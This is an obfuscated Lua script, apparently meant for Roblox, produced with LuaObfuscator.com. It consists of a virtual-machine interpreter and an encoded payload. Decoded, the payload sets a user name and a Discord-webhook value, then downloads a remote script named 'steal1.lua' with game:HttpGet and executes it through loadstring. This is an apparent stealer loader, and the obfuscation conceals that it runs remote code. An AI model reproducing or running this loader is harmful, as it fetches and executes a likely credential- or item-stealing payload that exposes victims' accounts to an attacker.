--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v91=0;local v92;while true do if (v91==0) then v92=v2(v0(v30,16));if v19 then local v121=v5(v92,v19);v19=nil;return v121;else return v92;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v93=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -(877 -(282 + 595)))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v93-(v93%(932 -(857 + 74))) ;else local v94=((2207 -(1523 + 114)) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v94 + v94))>=v94) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=(1270 -(226 + 1044)) + 0 ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1;end if (v34==(1066 -(68 + 997))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + 2 ;return (v37 * (373 -(32 + 85))) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (961 -(892 + 65)) ;v38=1;end if (v38==(2 -(181 -(67 + 113)))) then return (v42 * (31011612 -14234396)) + (v41 * (120312 -54776)) + (v40 * (606 -(64 + 23 + 263))) + v39 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + 0)) then v46=3 -2 ;v47=(v20(v45,1 + 0 ,972 -(802 + 123 + 27) ) * ((5 -3)^(57 -(797 -(201 + 571))))) + v44 ;v43=2 + 0 ;end if (v43==((2138 -(116 + 1022)) -(915 + (341 -259)))) then if (v48==(0 -0)) then if (v47==(0 + 0)) then return v49 * (0 -0) ;else local v122=1187 -(1069 + 118) ;while true do if (v122==(0 -(0 + 0))) then v48=1 -0 ;v46=0 + 0 ;break;end end end elseif (v48==(3636 -1589)) then return ((v47==(0 + 0)) and (v49 * ((3 -2)/(791 -(368 + 423))))) or (v49 * NaN) ;end return v8(v49,v48-(3214 -2191) ) * (v46 + (v47/(((71 -51) -(10 + 8))^(199 -147)))) ;end if (v43==0) then v44=v23();v45=v23();v43=443 -(416 + 26) ;end if (v43==(6 -4)) then v48=v20(v45,10 + 11 ,31);v49=((v20(v45,56 -24 )==(439 -((1004 -(814 + 45)) + 293))) and  -1) or (431 -(44 + 386)) ;v43=1489 -(998 + 488) ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v68=1 + 0 , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 1456 -(282 + 1174) ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104==(0 + 0)) then local v117=(function() return 0 -0 ;end)();while true do if (v117==(0 -0)) then v95=(function() return 0 -0 ;end)();v96=(function() return nil;end)();v117=(function() return 1;end)();end if (v117==(2 -1)) then v104=(function() return 1;end)();break;end end end if (v104==(1 + 0)) then local v118=(function() return 285 -(134 + 151) ;end)();while true do if (v118~=(1665 -(970 + 695))) then else while true do if (v95~=(0 -0)) then else v96=(function() return v97();end)();if (v98(v96, #"!", #",")==(1990 -(582 + 1408))) then local v127=(function() return 1271 -(945 + 326) ;end)();local v128=(function() return;end)();local v129=(function() return;end)();local v130=(function() return;end)();local v131=(function() return;end)();while true do if (v127==(3 -2)) then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (v179~=(0 -0)) then else v180=(function() return 700 -(271 + 429) ;end)();while true do if (v180==1) then v127=(function() return 2;end)();break;end if (v180~=(0 + 0)) then else v130=(function() return nil;end)();v131=(function() return nil;end)();v180=(function() return 1;end)();end end break;end end end if (0==v127) then local v181=(function() return 0;end)();while true do if (v181==(1500 -(1408 + 92))) then v128=(function() return 1086 -(461 + 625) ;end)();v129=(function() return nil;end)();v181=(function() return 3 -2 ;end)();end if (v181~=(1825 -(1195 + 629))) then else v127=(function() return 1;end)();break;end end end if (v127~=(1 + 1)) then else while true do if (v128~= #"~") then else local v191=(function() return 0 -0 ;end)();local v192=(function() return;end)();while true do if ((241 -(187 + 54))~=v191) then else v192=(function() return 780 -(162 + 618) ;end)();while true do if (v192~=(1 + 0)) then else v128=(function() return 2 + 0 ;end)();break;end if ((0 -0)==v192) then v131=(function() return {v99(),v99(),nil,nil};end)();if (v129==(0 -0)) then local v205=(function() return 0 + 0 ;end)();local v206=(function() return;end)();while true do if (v205~=(0 + 0)) then else v206=(function() return 1769 -(1749 + 20) ;end)();while true do if (v206==(1636 -(1373 + 263))) then v131[ #"asd"]=(function() return v99();end)();v131[ #".dev"]=(function() return v99();end)();break;end end break;end end elseif (v129== #">") then v131[ #"-19"]=(function() return v100();end)();elseif (v129==2) then v131[ #"asd"]=(function() return v100() -((1 + 1)^(1016 -(451 + 549))) ;end)();elseif (v129== #"91(") then local v213=(function() return 0;end)();local v214=(function() return;end)();while true do if (v213~=(0 + 0)) then else v214=(function() return 0 + 0 ;end)();while true do if (v214~=0) then else v131[ #"xxx"]=(function() return v100() -(2^(38 -22)) ;end)();v131[ #"asd1"]=(function() return v99();end)();break;end end break;end end end v192=(function() return 1;end)();end end break;end end end if (v128==0) then local v193=(function() return 0 -0 ;end)();local v194=(function() return;end)();while true do if (v193==0) then v194=(function() return 0 -0 ;end)();while true do if (v194==1) then v128=(function() return  #">";end)();break;end if (v194==(1384 -(746 + 638))) then v129=(function() return v98(v96,2, #"19(");end)();v130=(function() return v98(v96, #"?id=",6);end)();v194=(function() return 1 + 0 ;end)();end end break;end end end if (v128== #"-19") then if (v98(v130, #"19(", #"19(")== #"}") then v131[ #"?id="]=(function() return v101[v131[ #"xnxx"]];end)();end v102[v103]=(function() return v131;end)();break;end if (v128~=2) then else local v196=(function() return 0 -0 ;end)();local v197=(function() return;end)();while true do if (v196~=0) then else v197=(function() return 0;end)();while true do if (v197==(342 -(218 + 123))) then v128=(function() return  #"xxx";end)();break;end if (v197==0) then if (v98(v130, #"{", #"]")~= #",") then else v131[1583 -(1535 + 46) ]=(function() return v101[v131[2 + 0 ]];end)();end if (v98(v130,5 -3 ,1 + 1 )== #">") then v131[ #"nil"]=(function() return v101[v131[ #"19("]];end)();end v197=(function() return 561 -(306 + 254) ;end)();end end break;end end end end break;end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 114 -(4 + 110) ;end)();local v109=(function() return;end)();while true do if (v108~=0) then else v109=(function() return 0 + 0 ;end)();while true do if (v109==(1427 -(41 + 1386))) then local v125=(function() return 0 -0 ;end)();while true do if ((0 + 0)==v125) then v105[v106-#"!" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #" ",v59 do local v71=(function() return 0 -0 ;end)();local v72=(function() return;end)();local v73=(function() return;end)();local v74=(function() return;end)();while true do if (v71~=(1467 -(899 + 568))) then else local v112=(function() return 0 -0 ;end)();while true do if (v112==(0 + 0)) then v72=(function() return 0 + 0 ;end)();v73=(function() return nil;end)();v112=(function() return 1;end)();end if (v112==(1 + 0)) then v71=(function() return 2 -1 ;end)();break;end end end if (v71==(1 -0)) then v74=(function() return nil;end)();while true do if (v72~=(604 -(268 + 335))) then else if (v73== #"|") then v74=(function() return v21()~=(290 -(60 + 230)) ;end)();elseif (v73==(574 -(426 + 146))) then v74=(function() return v24();end)();elseif (v73== #"xxx") then v74=(function() return v25();end)();end v60[v70]=(function() return v74;end)();break;end if (v72==(65 -(30 + 35))) then local v124=(function() return 0 + 0 ;end)();while true do if ((1258 -(1043 + 214))==v124) then v72=(function() return 1;end)();break;end if (0==v124) then v73=(function() return v21();end)();v74=(function() return nil;end)();v124=(function() return 3 -2 ;end)();end end end end break;end end end v58[ #"91("]=(function() return v21();end)();for v75= #"|",v23() do FlatIdent_44839,Descriptor,v21,v20,v22,v23,v60,v55,v75=(function() return v53(FlatIdent_44839,Descriptor,v21,v20,v22,v23,v60,v55,v75);end)();end for v76= #"]",v23() do v56,v76,v28=(function() return v54(v56,v76,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1213 -(323 + 889) ];local v66=v62[5 -3 ];local v67=v62[583 -(361 + 219) ];return function(...) local v77=v65;local v78=v66;local v79=v67;local v80=v27;local v81=321 -(53 + 267) ;local v82= -(1 + 0);local v83={};local v84={...};local v85=v12("#",...) -((1250 -(176 + 91)) -(18 + 964)) ;local v86={};local v87={};for v110=0 -0 ,v85 do if (v110>=v79) then v83[v110-v79 ]=v84[v110 + 1 + 0 ];else v87[v110]=v84[v110 + 1 + 0 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do local v111=850 -(20 + 830) ;while true do if ((4342>3456) and (v111==(1 + 0))) then if ((v90<=10) or (2368>2642)) then if ((2105==2105) and (v90<=(130 -(116 + 10)))) then if (v90<=(1 + 0)) then if (v90==(738 -(542 + 196))) then do return;end else local v132=0 -(0 -0) ;local v133;while true do if ((4012>=2179) and (v132==(0 + 0))) then v133=v89[(2 -0) + 0 ];v87[v133]=v87[v133]();break;end end end elseif (v90<=(1 + (1093 -(975 + 117)))) then for v146=v89[2],v89[7 -4 ] do v87[v146]=nil;end elseif (v90==(7 -4)) then v87[v89[1553 -(1126 + 425) ]]=v64[v89[408 -(118 + 287) ]];else v87[v89[7 -5 ]]=v64[v89[1124 -(118 + 1003) ]];end elseif ((4288>3111) and (v90<=(20 -13))) then if (v90<=5) then local v134=v89[(2254 -(157 + 1718)) -(142 + 235) ];v87[v134]=v87[v134](v13(v87,v134 + (4 -3) ,v82));elseif ((4160>639) and (v90==(2 + 4))) then local v154=v89[979 -(553 + 424) ];local v155=v87[v89[5 -2 ]];v87[v154 + 1 + 0 ]=v155;v87[v154]=v155[v89[4 + 0 ]];elseif (v87[v89[2 + 0 + 0 ]]==v89[2 + (6 -4) ]) then v81=v81 + 1 + 0 ;else v81=v89[6 -3 ];end elseif (v90<=(22 -14)) then local v136=v89[2];v87[v136]=v87[v136](v13(v87,v136 + (2 -1) ,v82));elseif (v90>((10 -7) + 6)) then v64[v89[(1032 -(697 + 321)) -11 ]]=v87[v89[755 -(239 + 514) ]];else local v161=v89[(2 -1) + 1 ];local v162=v87[v89[1332 -(797 + 532) ]];v87[v161 + 1 + 0 ]=v162;v87[v161]=v162[v89[2 + 2 ]];end elseif ((3314>=625) and (v90<=15)) then if (v90<=12) then if (v90==((52 -27) -14)) then v81=v89[3];else for v148=v89[1204 -(373 + 829) ],v89[734 -(476 + 255) ] do v87[v148]=nil;end end elseif ((588<1692) and (v90<=(1143 -(369 + 761)))) then local v139=0;local v140;local v141;local v142;local v143;while true do if ((v139==(1 + 0)) or (4797<3651)) then v82=(v142 + v140) -(1 -0) ;v143=(0 -0) -0 ;v139=240 -(64 + 174) ;end if (v139==2) then for v186=v140,v82 do local v187=0;while true do if (v187==(0 + 0)) then v143=v143 + (1 -0) ;v87[v186]=v141[v143];break;end end end break;end if (v139==(336 -(144 + 75 + 117))) then v140=v89[218 -(42 + 174) ];v141,v142=v80(v87[v140](v13(v87,v140 + 1 ,v89[3 + 0 ])));v139=1 + 0 ;end end elseif (v90>(6 + 8)) then v87[v89[3 -1 ]]=v89[1507 -((972 -609) + 1141) ];else local v168=1580 -(1183 + 397) ;local v169;while true do if ((((1227 -(322 + 905)) -0)==v168) or (4177>4850)) then v169=v89[2 + 0 ];v87[v169]=v87[v169]();break;end end end elseif (v90<=18) then if (v90<=(12 + 4)) then v87[v89[2]]=v89[1978 -(1913 + 62) ];elseif (v90==17) then v64[v89[2 + 1 ]]=v87[v89[(616 -(602 + 9)) -3 ]];else local v172=1933 -(565 + 1368) ;local v173;local v174;local v175;local v176;while true do if ((7 -5)==v172) then for v198=v173,v82 do local v199=0;while true do if (v199==(1661 -(1477 + 184))) then v176=v176 + (1 -0) ;v87[v198]=v174[v176];break;end end end break;end if ((1 + 0)==v172) then v82=(v175 + v173) -1 ;v176=0;v172=858 -(564 + 292) ;end if (v172==0) then v173=v89[2 -0 ];v174,v175=v80(v87[v173](v13(v87,v173 + (2 -1) ,v89[307 -(244 + 60) ])));v172=1 + 0 ;end end end elseif (v90<=(495 -((1230 -(449 + 740)) + (1307 -(826 + 46))))) then if (v87[v89[2]]==v89[4]) then v81=v81 + (1002 -(938 + (1010 -(245 + 702)))) ;else v81=v89[3];end elseif ((v90==((50 -34) + 4)) or (400>1111)) then v81=v89[3];else do return;end end v81=v81 + (1126 -(936 + 189)) ;break;end if (v111==(0 + 0 + 0)) then v89=v77[v81];v90=v89[1614 -((3463 -(260 + 1638)) + 48) ];v111=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!093Q00028Q0003043Q0075736572030F3Q005375706572626F7967757934333231030E3Q00646973636F7264776562682Q6F6B03053Q00682Q747073030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031A3Q00682Q7470733A2Q2F6F746F2E62696F2F737465616C312E6C756100173Q00120F3Q00014Q000C000100013Q0026133Q00020001000100040B3Q0002000100120F000100013Q002613000100050001000100040B3Q00050001001204000200033Q001211000200023Q001204000200053Q002009000200020006001204000400073Q00200900040004000800120F000600094Q0012000400064Q000800023Q00022Q0001000200010002001211000200043Q00040B3Q0016000100040B3Q0005000100040B3Q0016000100040B3Q000200012Q00153Q00017Q00",v9(),...);